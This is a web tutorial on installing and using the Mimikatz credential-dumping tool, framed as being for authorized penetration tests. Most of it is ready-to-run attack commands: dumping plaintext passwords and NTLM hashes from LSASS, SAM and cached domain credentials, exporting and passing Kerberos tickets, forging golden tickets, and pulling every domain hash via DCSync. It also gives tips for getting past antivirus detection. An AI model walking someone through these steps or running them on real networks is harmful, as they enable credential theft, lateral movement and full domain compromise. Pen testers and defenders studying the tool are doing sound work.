EN
ENNA

Getting Started Guide

How to Install and Use Mimikatz

This guide covers downloading Mimikatz and using it to extract credentials from Windows memory during authorized penetration tests.

Prerequisites

  • -Windows (target system)
  • -Administrator/SYSTEM privileges
  • -Authorization to test the target system
Official Documentation
1

Obtain Mimikatz

Download Mimikatz from the official GitHub repository. Note that antivirus will flag it.

Download

# Download from https://github.com/gentilkiwi/mimikatz/releases
# Extract zip
# Run mimikatz.exe from an admin command prompt

Or build from source

# Clone https://github.com/gentilkiwi/mimikatz
# Open mimikatz.sln in Visual Studio
# Build Release x64

Note: Every AV product detects mimikatz. In real engagements, operators often compile from source with modifications, use Invoke-Mimikatz (PowerShell), or dump LSASS memory and analyze it offline. For lab practice, add an AV exclusion.

2

Elevate Privileges

Mimikatz needs debug privileges to access LSASS process memory.

Enable debug privilege

privilege::debug

Check it worked

# Should output: Privilege '20' OK

Note: This requires running as Administrator. If you get 'ERROR kuhl_m_privilege_simple', you don't have sufficient privileges.

3

Dump Credentials

Extract plaintext passwords, NTLM hashes, and Kerberos tickets from memory.

Dump all credentials

sekurlsa::logonpasswords

Dump NTLM hashes

lsadump::sam

Dump cached domain credentials

lsadump::cache

Note: logonpasswords shows credentials for all logged-in users. On older Windows versions (pre-2012), you'll often get plaintext passwords. On newer versions, you get NTLM hashes which can be cracked or used in pass-the-hash attacks.

4

Kerberos Attacks

Extract and manipulate Kerberos tickets for lateral movement.

List Kerberos tickets

kerberos::list

Export tickets

kerberos::list /export

Pass the ticket

kerberos::ptt ticket.kirbi

Golden ticket (requires krbtgt hash)

kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt

Note: Golden tickets give you unrestricted access to every service in the domain. This requires the krbtgt account hash, which you can get after compromising a domain controller with lsadump::dcsync.

5

DCSync Attack

Replicate credentials from a domain controller remotely, without touching the DC's disk.

DCSync specific user

lsadump::dcsync /domain:corp.local /user:Administrator

DCSync all users

lsadump::dcsync /domain:corp.local /all /csv

Note: DCSync requires Domain Admin or Replication rights. It simulates a domain controller requesting password replication, pulling NTLM hashes without needing to log into the DC. This is the cleanest way to extract domain credentials.

Back to MimikatzFull Documentation